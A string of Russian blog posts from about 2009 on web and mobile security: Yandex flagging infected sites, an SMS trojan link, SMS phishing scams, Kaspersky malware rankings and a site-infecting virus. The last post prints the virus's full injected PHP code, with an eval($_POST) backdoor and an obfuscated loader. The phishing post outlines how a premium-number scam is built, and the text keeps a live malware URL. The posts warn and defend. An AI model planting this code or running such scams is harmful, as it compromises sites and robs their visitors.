“По первым оценкам, опасные сайты составляют доли процентов сайтов Рунета. Зараженным может оказаться любой, даже известный ресурс. в этом не всегда виноват его владелец, заражение могло произойти в результате взлома сайта. На сервисе Я.Вебмастер хозяин ресурса может узнать подробности о состоянии своего сайта и получить рекомендации.” – сообщили нам Елена Колмановская и Михаил Ушаков.

Но по прошествии 6 месяцев, ситуация уже не столь оптимистична. “Ежедневно предупреждение о том, что “сайт может угрожать безопасности вашего компьютера” показывается около 4.5 миллионов раз… Сейчас нам известно около 140 тысяч страниц на 30 тысячах веб-сайтов, которые могут предоставлять опасность для компьютеров пользователей при посещении.” – согласитесь, это уже не доли процентов. Даже так распиареный “Свинной грип” не имеет таких показателей.

Что же делать в таком случае? Оставить как есть? Но человек пользуется поиском от Яндекса, с целью нахождения полезной информации. А предупреждение о заражении сайта отпугивает посетителей. Люди, начинают опасаться заходить на подозрительные сайты – как следствие не находят полезной и нужной информации.

“Пользователи проявляют осторожность и избегают посещения помеченных сайтов. Только около 7% из них раскрывают и читают блок-предупреждение и всего 0.5% все же набираются смелости, чтобы перейти на опасный сайт на свой страх и риск.” А как же быть с оставшимися 92.5%? Интернет становится источником заразы, а не информации.

К счастью Яндекс, как и Проктер&Гембл, заботятся о нас. “Теперь результаты поиска, помеченные как опасные, имеют ссылку на “безопасную копию”. С ее помощью можно посмотреть оригинальный текст страницы, сохраненный Яндексом, но без элементов оформления и сценариев, которые могут вызывать вредоносный код. Ссылки внутри этой страницы на этот же или другие опасные сайты ведут на промежуточную страницу, с которой можно будет перейти на оригинальную страницу или на ее “безопасную копию”. В “безопасной копии”, так же как и в аналогичной ей “сохраненной копии” для неопасных сайтов, подсвечиваются ключевые слова, по которым осуществлялся поиск.”

Будем надеяться, что данные меры позволят людям получать информацию в полной мере. не сильно опасаясь заражения.

Ознакомиться с исследованиями компании Яндекс, можно в блоге Яндекс.Поиск.

По теме

• 10 альтернативных браузеров, о которых Вы вероятно не слышали
• У панели Я.Вебмастер изменился дизайн
• Интересная десятка статей: Октябрь 209
• Знакомства псто.
• Яндекс, Google, социальные сети и вирусы

Враг не дремлет и все такое!

Сегодня я бы хотел поговорить про очередной вражеский способ навредить честным людям или кинуть их ан деньги. Способов этих, традиционно over 9000. Хочется перефразировать известную поговорку: «Да не оскудеет рука берущего!». И берущие, действительно делают все, что бы поток денег не оскудевал. Их бы энергию, дав мирное русло…

К написанию этого поста меня сподвигло сообщение в аське, пришедшее от одного из контактов, который, судя по всему взломали. Сообщение короткое, всего лишь одна ссылка: http://xbest.in/2721/id43254154.jar

Пытливый ум и внимательный глаз быстро обратит внимание на маленький подвох. Дело в том, что по ссылке скачивается Java-файл в формате .JAR. Как мы знаем, JAR файл — это Java архив, который представляет собой обычный ZIP-архив, в котором содержится часть программы на языке Java. Данный формат был разработан компанией Sun Microsystems, в рамках расширения мобильной поддержки J2ME-приложений. После скачивания этого архива, предлагается установить приложение на мобильный. В некоторых случаях, предложение не появляется, а установка производится автоматически. Думаю понятно, что ничего хорошего в такой ссылке содержаться не может.

Данный способ заражения появился после распространения talk-клиента ICQ, а именно его Java-версии, известной, как Jimm на мобильных платформах. В настоящее время, почти все любители «поболтать по аське» кроме самого ICQ, для общения в рабочее время, устанавливают Jimmy на мобильные, для «продолжения разговора в пути». Учитывая. Что подавляющее количество таких «говорунов» – девушки со светлым окрасом волос, адекватной реакции на странную ссылку мы не ожидаем.

После проверки скаченного на ПК файла, с помощью онлайнового антивирусного сканера имени Криса Касперского стало известно название злодейского подарка: SMS.J2ME.Boxer.j. По версии Доктор Вебера подарок зовут Java.SMSSend.24.

Модификация ”j”, не смотря на ее появление аж в апреле месяце, на сайте Касперского ни как не описана. Но судя по всему, это очередная модификация такого, не менее известного троянца как Trojan-SMS.J2ME.Konov.e

Если моя догадка верна, то зараженного ожидает потеря нескольких сотен рублей, которые уйдут вместе с СМС-сообщениями на премиум номера.

Вот такие у нас новости с фронта. Е доверяйте ссылкам, не ставьте ICQ на мобильные. Запасайтесь провиантом, скоро война.

Удачи! :)

По теме

• Пранкеры: увидел – убей!
• Яндекс стоит на страже но и не забывает об интересах граждан.
• Знакомства псто.
• Рейтинг вредоносных программ за июнь 2009 от Лабаратории Касперского.
• Переведенные посты, как метод энтропии в блогах

Дорогие друзья!

К написанию этого поста меня побудило СМС-сообщение с номера 8-951-2669366. Сообщение было грозным и устрашающим, прямо так и хотелось позвонить :). Но я не лыком шитый, и посему на удочку не попался. А сообщение было следующим:

“Ув.Абонент!Ваш номер по тех.причинам будет приостановлен! Обратитесь в тех-центр Beeline@  по тел.89512669366 Звонок бесплатный“

Вот такое вот сообщение )) Есть только несколько НО.

1. Служба билайна, которая может рассылать такие СМС называется Служба поддержки и ни как иначе
2. Все сообщения от сервисных служб Оператора рассылаются с номеров, прошитых на Сим-карте, как следствие вы видите не номер (он, кстати должен быть 4-значным) а имя, например МТС (Payments – сообщения о получении платежа), Beeline (BeelineInfo), Megafon, или какой то еще для остальных операторов
3. Очень смутил меня код абонентского номера. Проверил – и точно! Абонент относится к Оператору Теле2 Санкт-Петербург. Нормально? Московскому абоненту, сервисная служба Билайн пишеь с телефонного номера конкурента, зарегистрированного в Ленинградской области.

Поржав над тупостью спамера, я решил, по привычке его покарать. Технология проста, как веник – необходимо написать по контактному адресу электронной почты оператору, с которого была совершена рассылка. Так я и поступил. И заодно продублировал письмо коллегам из PR-службы этого оператора, скорость реакции составила примерно минут 15. Очередным номером меньше. Добро, мир, красота.

А теперь давайте поподробнее рассмотрим этотспособ вредительства.

Ало? Это прачечная? Будни телефонных хулиганов.
Есть такой древний способ вредительства, как «Пранк (Prank)». В те давние времена, когда журнал «Хакер» рассказывал читателям об этом виде «развлечения» в пранк вписывались только Телефонное хулиганство (Телефонный терроризм) и Различные способы несанкционированного доступа к телефонным сетям (прослушка, звонки за чужой счет итд, итп).

Но то, были счастливые годы. Годы, когда пустующие почтовые ящики, в которых, внимание – не было спама, были реальностью. Конечно, сначала придумали спам, а потом придумали способы доставки его людям, но его количество в Рунете были ничтожно малы, по сравнению с настоящими временами. Сейчас – рекламные письма, которые Вам не нужны, стали такой же не приятной частью действительности, как дождь, отключение горячей воды и ДПС. Но вернемся к Пранк`у.

Теперь, когда технологии сотовой связи позволяют, например установить стоимость входящих на номер, или арендовав смс-гейт производить рассылку сообщений с 4-значного номера, можно смело сказать, что в среде пранкеров во всю рулит Фишинг. Многие из нас оставляют номера своих мобильных на различных сайтах, совершенно не беспокоясь об их дальнейшей судьбе, в то же время, основной e-mail мы бережем как зеницу ока (N.B. Зеница – это кстати зрачок глазного яблока, согласно Далю). А чем же нам грозит неосторожное обращение с мобильным номером? Да вобщем то, тем же чем и не осторожное обращение с мылом. Его за несут в базу рассылки. А дальше…

За добро нужно платить, или для чего им это надо?
На вопрос: «Зачем?» – ответить очень просто. Конечно же для нечестного способа заработать деньги. Ведь, если ты можешь написать человеку, ты можешь навязать ему информацию. Это первый и самый простой способ. Яндекс выдает десятки страниц с ссылками на сайты продающих смс-рекламу. Многие из этих сайтов, работаю ну совершенно не цивилизованными методами.

Статистика поиска говорит нам, что по запросу рассылка смс в этом месяце было 7927 показа. Замечу, что этот месяц начался всего лишь 3 дня назад. Так что смело можно это число разделить на 3, и затем умножить на 30, таким образом, становится понятно, что реальная цифра = 79270 показов в месяц. Может быть, и не самый рекордный показатель, но число не маленькое.

Но смс-спам, это только цветочки и банальности. Наибольший интерес представляет фишинг. Причем, если в традиционном понимании фишинга его цель получить Ваши данные (пароль, номер кредитки, пин-код), то в телефонном фишинге целью является заставить Вас позвонить, написать СМС или перейти по WAP-ссылке. Что Вас будет ожидать на том конце «провода» зависит от фантазии злоумышленника. В лучшем случае, Вы прослушаете рекламное сообщение, получите СМС со спамом или загрузите вирус.  Противном же случае, Вы лишитесь денег. Но как?

Это Вам не блох подковывать, здесь хитрость нужна!
Технология получения с Вас денег просто до не приличия. Для начала необходимо сделать так, что бы в случае звонка  и отправки СМСна Ваш номер со счета позвонившего на Ваш счет списывалась некая сумма, указанная Вами. Такая услуга называется “Коммерческий номер” и предоставляется для оказания услуги платных сервисов (гороскопов, викторин, итп, полезных справок, итд) Подключить услугу «Коммерческий номер» не составляет большого труда, Яндекс в помощь, так сказать. После подключения данной услуги, образуется связка смс-гейт → Коммерческий номер. Все, инструмент для кидалова готов.

Через СМС-гейт на приобретенную ранее базу абонентских номеров рассылается сообщение, побождающее адресата к звонку. Например: “Перезвони на этот номер срочно, на моем деньги кончились. Это Важно. Саша.” А ведь у многих есть друзья Саши. У меня например супруга Александра. А вдруг что-то случилось? А вдруг нужна помощь? Сложно удержаться. Далее Вы звоните на коммерческий номер, либо слушаете тишину, либо отвечает “Саша” и говорит, что номером ошибся, а проблема уже утреслась, а в это время с Вашего счета утекает некоторая сумма. Сумма может составлять и 30 рублей и 300 рублей. Но Вы не одиноки в Вашем желании узнать что случилось.

Второй вариант сообщения, побудивший меня собственно к написанию этого поста, заключается в том, что Вам пишет Служба поддержки Beeline, саппорт Сапы или еще какая то техническая служба и сообщает,что по техническим причинам Ваш номер (аккаунт) будет заблокирован, и моло предлагает уточнить все вопросы по телефонному номеру… Ну дальше Вы поняли.

Куда бежать, кому жаловаться. Мотоды санитарии и дезинфекции.
Для того что бы избегать кидания, со стороны пранкеров необходимо следовать следующим правилам:

1. Не оставлять свои реальные мобильные номера при регистрации на сайтах и сервисах. Даже, если сайт или сервис заслуживате доверия, нельзя поручиться, что он не будет взломан и Ваш мобильный не будет помещен в Базу. Да и сотрудники не всегда бывают честными.
   Если Выбора нет, и Вам обязательно нужно оставить мобильный номер, оставте номер человека, который Вам противен, например начальника. (Шутка)
2. При общении в открытых источниках (форумах, блогах, free-lance проектах) не оставляйте свой номер в открытом доступе. ICQ, e-mail, Skipe – этого достаточно что бы с Вам связались.
3. Одноклассники и ВКонтакте – ну и зачем Вам указывать там свой номер. Кто должен на него позвонить? Кто должен – уже знает Ваш номер, остальных в аську.
4. Если Вы зашли на рессурс, и для получения доступа к нему Вам нужно отправить СМС – забудте. Порнуха бесплатно валяется на торрентах террабайтами, Рефераты и курсовые нужно писать самостоятельно, а Одноклассники – унылое говно.

Если Вы все таки уже засветили свой номер:

1. Нет смысла включать услугу “Черный список”, номер скорее всего будет быстро заблокирован и это Вас не спасет.
2. Не спешите перезванивать по любому “Саше” у которого кончились деньги. Нехай сам звонит. Если у него кончились деньги и он пишет СМС с чужого телефона, значит может и позвонить с чужого. Если не может позвонить – значит не так уж и важно. Если деньги кончились и у чужого телефона, вокруг еще есть люди. Если это действительно важно, и денег у него на телефоне и правда нет, а у чужого телефона тоже все деньги ушли на СМС, и их двоих завалило в подземном бункере Путина, они заблудились в Шервудском лесу или Гремпенской трясине – это 100% наебалово. В таких местах не ловит телефон. Если ваш друг УНИКУМ и при всех этих условиях он нашел точку дозвона – 911 у всех мобильных операторов бесплатен, так же как 001, 002, оо3. Ну и если…. Короче, нафига Вам такой лузер? ))))
3. Помните. МТС, БиЛайн, Мегафон, Теле2, СкайЛинк и прочие операторы, никогд не будут сообщать Вам технические новости с непонятных номеров. Почти всегда используется сервисный номер, зашитый в Сим-карте. В любом случае, этот номер опубликован на сайте. Ну и конечно же, БиЛайн не будет просить Вас перезвонить на номер другого оператора сотовой связи. НИЗАЧТО.
4. Не забудте сделать доброе дело. Сообщите оператору, что с его абонентского номера в такое то время был разослан спам. Операторы такого не любят и Пранкера “забанят”.

Будте бдительны. Враг не пройдет! 855AE790DB06B6AC9B6CC43475775355

[/nocrosspost]

По теме

• Не оскудеет рука берущего или новые способы срубить бабла
• Знакомства псто.
• Яндекс стоит на страже но и не забывает об интересах граждан.
• Переведенные посты, как метод энтропии в блогах
• Реклама в дневнике на LiveJournal.com

Аналитики Лабаратории Касперского продолжают запугивать исследовать вопрос вирусной угрозы. В прошлом месяце аналитик Лабаратории порадовал нас вирусным ТОП-20. В этом месяце традиция нашла свое продолжение.

Стоит заметить, что написание предыдущей статьи на эту тему мне действительно помогла. Именно благодаря прошлому рейтингу, я познакомился с таким вирусом, как Kido и даже достаточно подробно его описал. Прошла неделя, как я благополучно заразил все три домашних компьютера именно этой заразой. Вот тут то мне и пригодились знания, полученные в процессе написания своей статьи. Вирус был благополучно обнвружен и обезврежен.

Как и в прошлом месяце, читателям сайта Securelist.com дали сводный аналитический отчет по 2 видам рейтинга:

1. Вредоносные, рекламные и потенциально опасные программы, которые были детектированы на компьютерах пользователей ПО Лабаратории Касперского.
2. Вредоносные, рекламные и потенциально опасные программы, которые были детектированы на компьютерах пользователей и отличающихся интересными и сложными методами обфускации кода и сокрытия себя в системе.

В этом месяце, аналитика более интересна.  Первую ТОП-20, как и в прошлый раз. составляли из вредоносных программ, которые были детектированны на компьютерах пользователей. А вот второй ТОП-лист составлялся на основе данных, полученных в результате работы веб-антивируса, и освещает обстановку в интернете, что, согласитесь, простым блоггерам будет более интересно.

ТОП-20 Вирусов детектированных на компьютере пользователей. Рейтинг А

По поводу этого “форбс для вредоносных программ”, можно сказать не много. Первое место, все так же занимает злосчастный Net-Worm.Win32.Kido.ih, он был обнаружен на 58200 компьтерах, +3 моих, который не могут считаться в этом рейтинге, попричине отсутствия AVK на борту. Т.е. если представить сколько еще PC защищены другими антивирусными программами и не включены в этот рейтинг, то цифра возрастает в разы. Помимо всего прочего, стоит заметит, что тот мудак (или группа мудаков), который занимается написанием и совершенствованием KIDO не дремлют и продолжают выпускать новые модификации такими модификациями стали Net-Worm.Win32.Kido.jq и Net-Worm.Win32.Kido.ix.

Лабаратория Касперского, пока что молчит об особенностях модификаций, но продположу, что эти изменения всязаны с обходами заплаток системы, и адаптация к новым уязвимостям. И дай то бог, что бы мои знания об этих модификациях остались на уровне предположений, а не личного знакомства.

Так же под прицел Аналитиков из Лабаратории касперского попал вполне успешный новичек (4624 компьютеров; 6975 веб-страниц) Trojan-Downloader.JS.LuckySploit.q. Новичек “рванул с места в карьер” и помимо средненького результата на компьютерах пользователей (11 место в рейтинге А), уверенно оседлал первую тройку по заражаемости веб-страниц (3 место в рейтинге Б).

ТОП-20Вирусов на веб-страницах. Рейтинг Б

Как я и говорил, второй рейтинг, представляется мне более интересным, так как описывает проблему безоавсности не компьютеров а веб-старниц, то есть наших с вами сайтов и блогов. В этот рейтинг попадают вредоносные программы, обнаруженные на веб-страницах, а также те зловреды, которые делали попытку загрузиться с веб-страниц.

Первое место занимает Trojan-Downloader.JS.Gumblar.a, являющий собою отличный пример drive-by-загрузки.

Trojan-Downloader.JS.Gumblar.a — это зашифрованный скрипт небольшого размера, при исполнении перенаправлющий пользователя на зловредный сайт, с которого в свою очередь с помощью эксплуатации набора уязвимостей скачивается и устанавливается вредоносный исполняемый файл. Последний после установки в систему влияет на веб-трафик пользователя, изменяя результаты поиска в поисковой системе Google, а также ищет на компьютере пользователя пароли от FTP-серверов для последующего их заражения.

Таким образом, засев на вашем компьютере, вирус совершенно не стесняясь и не морализируя о правильности своих действий, включает вашу машину в очередную Бот-сеть, эксплуатируя ваш трафик, и скрываясь под вашим адресом.

Таким же методом действует уже упомянутый нами Trojan-Downloader.JS.LuckySploit.q. Этот зашифрованный скрипт, подобно опытному диверсанту, вначале изучает вашу Систему, собирает данные о конфигурации браузера, а затаем отправив на удаленный сайт эту информацию в зашифрованном виде, получает в ответ подмогу, в лице еще одной пашки скриптов. Притом, стоит заметить, именно тез скриптов, которые могут вам навредить и остаться некоторое время не обнаруженными.

Так же в рейтинге присутсвуют скрипты, использующие уязвимости продуктов Adobe Flash Player и Adobe Reader. Учитывая ряд онлайн сервисов от компании Adobe и Fine Reader, которые на правах стартапов врываются в нашу жизнь, стоит ожидать ихи укрепления и роста в данном рейтинге. Кроме того, активно используются разнообразные уязвимости в решениях Microsoft: например, Trojan-Downloader.JS.Major.c пытается использовать сразу несколько уязвимостей в различных компонентах ОС, а также в компонентах Microsoft Office.

Ну, и на последок, “Касперы” порадовали нас интересной информацией о рейтинге стран, в которых отмечено наибольшее количество попыток заражения через веб. На первом месте, что не удивительно – Китай (56,41% попыток заражений), на втором – РУсь-Матушка (5,92%), на третьем США (4,86%).

Вот такая вот обстановка на фронте, дорогие друзья. Статья написана на основе июньской аналитики Лабаратории Касперского.

На этом пожалй все, будте осторожны – враг не дремет.

По теме

• Касперского опубликовала рейтинг вирусов за май 2009
• Яндекс стоит на страже но и не забывает об интересах граждан.
• Не оскудеет рука берущего или новые способы срубить бабла
• Яндекс, Google, социальные сети и вирусы
• Яндекс сообщает веб-мастерам о заражении сайтов

Некоторые считают рейтинги бессмысленными. Некоторые считают их основным сжатым, структурированным источником информации. Я же считаю, что рейтинги просто есть. И каждый видит в них либо пользу, либо бесполезность. Но рейтинги от этого не исчезают, и в общем то даже не грустят. Рейтинги просто есть.

Так, второго июня сего года, на следующий день после Дня защиты детей, вирусный аналитик Лаборатории Касперского представил вниманию пользователей Интернета два вирусных рейтинга.

Рейтинг первый:

Первый рейтинг сформирован по итогам работы Kaspersky Security Network (KSN) в мае 2009 года. И отображает вредоносные, рекламные и потенциально опасные программы, которые были детектированы на компьютерах пользователей в ходе работы антивирусного продукта Лабаратории Касперского версии 2009.

Лидером первого рейтинга стал сетевой червь Net-Worm.Win32.Kido.ih, не вошедший по результатам второго рейтинга даже в первую десятку. Сетевой червь, распространяющийся через локальную сеть и при помощи съемных носителей информации. При копировании на удалённые компьютеры червь создаёт временный файл с произвольным расширением. Этот способ значительно усложняет его удаление из системы. Основными деструктивными свойствами червя является в отключении служб:

Wuauserv – Включает загрузку и установку ключевых обновлений Windows в автоматическом режиме.

BITS -служит для передачи асинхронных данных через http 1.1 сервера. Например: На сайте Microsoft это используется для Windows Update.

И осуществляет блокировка доступ к адресам, содержащим строки:

indowsupdate, wilderssecurity, spamhaus, securecomputing, comodo, quickheal, avira, avast, esafe, drweb, eset, nod32, kaspersky, f-secure, panda, sophos, mcafee, norton, symantec, microsoft, defender, rootkit, malware, spyware, virus, и т. д.

То есть, практически обрубает большую часть информационных ресурсов, с помощью которых было бы возможно осуществить его нахождение и обезвреживание.

Рейтинг второй:

Второй рейтинг, выстраивался по данным о том, какими вредоносными программами чаще всего заражены обнаруженные на компьютерах пользователей инфицированные объекты. Второй рейтинг отличается интересными и сложными методами обфускации кода и сокрытия себя в системе.

Второй рейтинг возглавил Virus.Win32.Sality.aa, являющийся, по сути, клавиатурным шпионом (keylogger). Но при этом имеющий достаточно неприятные манеры борьбы за выжывание на машине пользователя. Среди них:

1. Завершение процессов популярных антивирусов
2. Блокировка выхода в Безопасный режим, при перезагрузке PC

Это вирус постоянно развивается и уже около года занимает первые места в ретингах вирусов.

Ссылки по теме:

Рейтинг вредоносных программ, май 2009 – статья на Viruslist.ru

Net-Worm.Win32.Kido.ih – описание сетевого червя и способа его лечения

Virus.Win32.Sality.d – описание Virus.Win32.Sality.d

Лечение Virus.Win32.Sality.d – описание процесса лечения вируса

По теме

• Рейтинг вредоносных программ за июнь 2009 от Лабаратории Касперского.
• Яндекс стоит на страже но и не забывает об интересах граждан.
• Не оскудеет рука берущего или новые способы срубить бабла
• Яндекс, Google, социальные сети и вирусы
• Яндекс сообщает веб-мастерам о заражении сайтов

Я так понимаю, это такой антикризисный ход – писать сценарии для фильмов ужасов. )))

Но если отбросить иронию и сарказм, меня начинает радовать такая обеспокоенность безопасностью сайтов и компьютеров пользователей. Ведь проблема зараженных сайтов последнее время стала достаточно актуальна. Взять к примеру проблему червя Win32.HLLW.AntiDurov, который заразил десятки тысяч компьютеров пользователей социалки ”В Контакте”. Или, к примеру, троянец Trojan.MulDrop.16008, который поселился на другой социалке Одноклассники.ру. Да и чего только стоит проникновение вирусов в святая-святых – поисковую выдачу Яндекса, Google, Рамблера и msn`а. Я лично заметил эту беду только на Яндексе и принял ее за хитрый маркетинговый ход.

К слову говоря, Интернациональный поисковый гигант – Google, так же не оставил эту проблему в стороне. Еще в мае 2008 года, предствитель Google рассказал о том, что зараженные файлы удаляются из поискового индекса. Вероятно, такие меры не принесли популярности, иначе Яндекс взял бы их на вооружение.

Статья, кстати, интересная и прекрасно сочетается с моей статьей.

Ссылки по теме:

Популярные сайты с вирусами никто не изолирует
«В контакте» вирусная эпидемия
Продолжение истории с вирусом «В контакте». Подключился «Касперский»
Пользователям “Одноклассников” раздали троянских коней

По теме

• Яндекс стоит на страже но и не забывает об интересах граждан.
• У панели Я.Вебмастер изменился дизайн
• Яндекс сообщает веб-мастерам о заражении сайтов
• Google меняет дизайн
• 10 альтернативных браузеров, о которых Вы вероятно не слышали

В принципе, единственным сигналом о заражении будет сообщение о вредоносном ПО, при заходе на сайт. Более никаких симптомов мною не замечено. но если подскажите – буду рад и признателен.

Врачи-диагносты:

Антивирусы, замечавшие на моей памяти этот вирус:

• Антивирус Касперского
• Nod 32

MacAffey, на моей памяти не замечал, как и Avast. Но зря грешить не буду, так как возможно проблему пофиксили в более поздних версиях. Но все равно, не доверяйте этим программам безоговорочно.

Течение болезни:

По сути, у этого вируса 2 модуля. Первый открывает на Вашем сайте 1-пиксельный фрейм, который через 3 прокси приводит на 4 прокси и дальше я. честно говоря не ходил. Вероятно в конце скрипт с рекламой, которая фиксирует просмотр. Второй модуль собственно заражает ФТП-менеджер и пересылает паорль от ФТП. То есть, пока выпользуетесь зараженным менеджером, ваши пароли всегда известны злоумышеннику.

Очаг:

Как и у любой медицинской болезни, у вируса о котором я веду речь есть излюбленные файы в которых он селится. Так как заражение происходит автоматически, с помощью скрипта,  заражение происходит по маске:

• index.*
• main.*
• home.*
• admin.*
• auth.*
• login.*
• etc
  где символом звездочки заменяется любое расширение файла, кроме .tpl

UPD 30.04.2009: Колеги с форума сообщают, что заражены были файлы и с друм именами, например:

wp-settings.php и jquery.js

Как видете, вирусмейкеры не стоят на месте, но так же сохраняется возможность, что это разновидность вируса под Wordpress.

Как видите, для заражения выбраны те файлы. которые с верятностью 90% процентов присутствуют на любом сайте. Так же стоит заметить, что в самом файле скрипт тоже придерживается определенного алгоритма. Так излюбленные места в коде это:

• после тега “<BODY>“
• после тега “</HTML>“
• после символа “?>“

Сам вирус. Вы легко узнаете. по конструкции

<!– <iframe> … </iframe> –>

<!-- 
document.write(unescape('...'));
 -->

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY3I0b0NpanFNcHRkRWElMjBzbzVIcmM0b0MlM0QlMkYlMkZvNUg5anFNNCUyRTJvNUg0Nzk1WiUyRTJadmIlMkU0b0MxOTRvQzVvNUglMkY5NVpqWnZicXVadmJlcnk0b0MlMkVqcyUzRXg4JTNDZEVhJTJGc3g4Y3JqcU1pcFp2YnRqcU0lM0UnKS5yZXBsYWNlKC80b0N8eDh8ZEVhfFp2YnxqcU18OTVafG81SC9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)));$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("n",$v))>5){$e=preg_match('#['"][^s'".,;?![]:/<>()]{30,}#',$v)||preg_match('#[([](s*d+,){20,}#',$v);if((preg_match('#bevalb#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- ndocument.write(unescape(.+?n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(s*<body)#mi',TMP_XHGFJOKL.'1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Возможны и другие формы кода.

Лечение и профилактика:

К сожалению, если вы подверглись заражению единственный способ избавится от вируса:

1. Удалить код вируса изо всех файлов сайта.
2. Сменить пароль от ФТП.
3. Сменить фтп менеджер.  Я стал использовать такую разработку, как Win SCP, после перехода на этот ftp-менеджер заражение сайта прекратилось. 

Однозначно подвержены атаке:

• встроенный фтп-менеджер программы Total Commander
• встроенный фтп-менеджер FAR-manager
• CuteFTP *.*

Выписной эпикриз:

К сожалению, данная публикация отражает только мой личный опыт, и возможно я что то упустил, так как не столкнулся, но надеюсь данной Вам информации хватит для принятия верного решения для защиты своего сайта.

Так же хочу заметить, что если у кого то из моих читателей есть, что добавить по теме  буду рад получить полезную информацию. Ставлю ссылки на источники.

Другие упоминания болезни:

Так же я порой натыкаюсь на упоминания об описанной выше проблеме на других блогах и форумах, может это кому то поможет:

http://www.webdeveloper.com/forum/showthread.php?t=203620 (en)

По теме

• Яндекс стоит на страже но и не забывает об интересах граждан.
• Не оскудеет рука берущего или новые способы срубить бабла
• Рейтинг вредоносных программ за июнь 2009 от Лабаратории Касперского.
• Касперского опубликовала рейтинг вирусов за май 2009
• Яндекс, Google, социальные сети и вирусы

Теперь, ученые решили исследовать компьютеры среднестатистических пользователец заваленных спамом. Согласно этим показателям из-за одного письма в атмосферу попадает 0,3 грамма углекислого газа. Вроде бы мало, но учитывая. что порой мне приходится разбирать по 100-200 спам писем в день, и это только на ордном компе, цифра получается совсем не маленькая.

По данным McAfee, на каждое сообщение тратится как минимум три секунды, что и увеличивает продолжительность работы компьютера. В год на разборку спама пользователи тратят примерно 100 млрд человеко/часов.

На мой взгляд, исследователи правы. Так как при прочтении спама я частенько говорю: “Спамеры – горите в аду!”, а некоторые желания имеют свойство сбываться, представьте сколько углекислого газа выделяет одна горящая в аду душа спамера…

Так то.

По теме

• Не оскудеет рука берущего или новые способы срубить бабла
• Знакомства псто.
• Пранкеры: увидел – убей!
• Переведенные посты, как метод энтропии в блогах
• Реклама в дневнике на LiveJournal.com